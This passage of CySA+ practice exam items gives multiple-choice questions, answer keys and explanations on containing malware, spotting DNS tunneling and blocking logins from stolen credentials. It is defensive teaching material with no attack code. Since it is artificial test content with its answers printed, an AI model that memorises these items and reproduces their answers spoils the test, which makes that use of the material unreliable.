D company-wide training is a long-term measure, not an immediate remediation step during an active infection. Although awareness training is critical, it cannot mitigate an ongoing attack.
CySA+ exam objectives require analysts to respond systematically to malware outbreaks, understanding persistence strategies such as registry Run keys, cron jobs, scheduled tasks, startup folders, WMI persistence, and unauthorized services. Analysts should first contain the threat, then move to identify indicators of compromise, remove malicious artifacts, investigate how the macro executed, and patch any vulnerabilities enabling the compromise.
This structured approach aligns with incident response phases: preparation, identification, containment, eradication, recovery, and lessons learned. Containment is essential because it stops the attacker’s foothold from expanding, protects additional hosts, and preserves evidence required for deeper analysis.
Question 19
A cybersecurity analyst detects anomalous outbound DNS queries originating from a single endpoint. The queries follow a consistent pattern of long, random-looking subdomains. The analyst suspects that the system may be communicating with a DNS-based command-and-control channel. Which action should the analyst take FIRST?
A) Isolate the affected endpoint and investigate DNS logs
B) Flush the DNS cache on all enterprise systems
C) Disable DNS across the network
D) Restart the affected endpoint to terminate the process
Answer: A
Explanation:
Long, pseudo-random subdomain queries are a common sign of DNS tunneling, where attackers encode data within DNS requests to bypass firewalls and exfiltrate information or communicate with command-and-control servers. When an endpoint exhibits these behaviors, immediate containment is crucial to prevent further data leakage or malicious communication.
A isolating the endpoint and investigating DNS logs is the correct first step. Containment prevents additional outbound communication, while DNS log analysis allows the analyst to confirm tunneling behavior, identify encoded payloads, review query destinations, and detect patterns indicative of malware.
B flushing DNS caches enterprise-wide is ineffective because the issue is with an active malicious process, not cached addresses. This action would not stop ongoing exfiltration.
C disabling DNS altogether would cripple network operations, preventing users from accessing websites, cloud applications, and internal resources. It is an extreme and inappropriate reaction.
D restarting the endpoint may temporarily stop the malicious process but risks destroying volatile evidence such as memory-resident malware, encoded payloads, and active sessions. It also allows the malware to execute its persistence mechanisms upon reboot.
CySA+ analysts must recognize indicators of DNS-based attacks, such as unusually high query frequency, uniform query size, non-human domains, DGA patterns, and encrypted data fragments within DNS payloads. Analysts should correlate SIEM alerts, endpoint logs, and network telemetry to confirm the compromise.
After containment, they should analyze system artifacts, inspect memory dumps, examine scheduled tasks, review running processes, and identify any unauthorized services. DNS tunneling is complex and often part of more advanced infiltration strategies, necessitating careful investigation and proper evidence preservation.
Question 20
An organization notices that multiple user accounts are generating successful logins from geographically impossible locations within minutes. The analyst suspects the use of stolen credentials. Which security control would MOST effectively prevent this type of attack?
A) Implement conditional access policies with impossible-travel detection
B) Increase minimum password length
C) Require password resets every 60 days
D) Disable all remote access capabilities
Answer: A
Explanation:
Logins from geographically impossible locations are a hallmark of credential compromise. Attackers often use cloud-based proxies, botnets, or compromised accounts to authenticate from distant regions in short intervals. The most effective countermeasure is to implement conditional access policies that evaluate the risk level of authentication attempts.
A impossible-travel detection automatically identifies when a login occurs from two different geographic regions within a time frame that is physically impossible. These systems use identity analytics, behavioral baselines, and machine learning to determine whether access attempts are legitimate. When anomalies are detected, access is denied or additional authentication challenges are required.
B increasing password length is beneficial but does not hinder attackers who already possess valid credentials.
C requiring password resets every 60 days is outdated and does not address real-time credential misuse.
D disabling remote access is unrealistic and would severely disrupt operations.
CySA+ candidates must understand identity protection mechanisms such as behavioral analytics, conditional access, impossible-travel logic, and risk-based authentication. These advanced controls evaluate context, device posture, location, and user behavior to detect anomalies indicative of credential misuse.
Impossible-travel detection is widely used in cloud identity platforms, helping to identify compromised accounts quickly and stopping attackers before lateral movement or privilege escalation can occur. This mirrors real-world practices and aligns directly with CySA+ exam objectives.
